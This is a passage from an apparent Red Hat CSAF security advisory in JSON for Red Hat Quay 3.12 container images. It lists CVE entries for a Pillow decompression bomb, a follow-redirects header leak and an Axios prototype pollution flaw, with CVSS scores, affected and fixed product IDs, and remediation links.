            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "Pillow: Pillow: Denial of Service via decompression bomb in FITS image processing"
    },
    {
      "cve": "CVE-2026-40895",
      "cwe": {
        "id": "CWE-212",
        "name": "Improper Removal of Sensitive Information Before Storage or Transfer"
      },
      "discovery_date": "2026-04-21T21:02:33.280553+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2460297"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in follow-redirects. When an HTTP request follows a cross-domain redirect (a redirection to a different domain), custom authentication headers, such as X-API-Key or X-Auth-Token, are not properly stripped. This allows these sensitive headers to be forwarded verbatim to the redirect target, potentially leading to the unintended disclosure of authentication information to an untrusted third party.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "follow-redirects: follow-redirects: Information disclosure via cross-domain redirects",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-40895"
        },
        {
          "category": "external",
          "summary": "RHBZ#2460297",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460297"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-40895",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40895"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40895",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40895"
        },
        {
          "category": "external",
          "summary": "https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-r4q5-vmmm-2653",
          "url": "https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-r4q5-vmmm-2653"
        }
      ],
      "release_date": "2026-04-21T19:59:59.759000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T18:16:29+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22629"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "follow-redirects: follow-redirects: Information disclosure via cross-domain redirects"
    },
    {
      "cve": "CVE-2026-42033",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T18:01:20.937507+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461607"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, an HTTP client library. This vulnerability allows an attacker to exploit a prototype pollution issue if another part of the application has already polluted the Object.prototype. By doing so, the attacker can intercept and modify JSON responses or take control of the HTTP communication. This could lead to unauthorized access to sensitive information like user credentials and request details.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: HTTP Transport Hijacking via Prototype Pollution",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
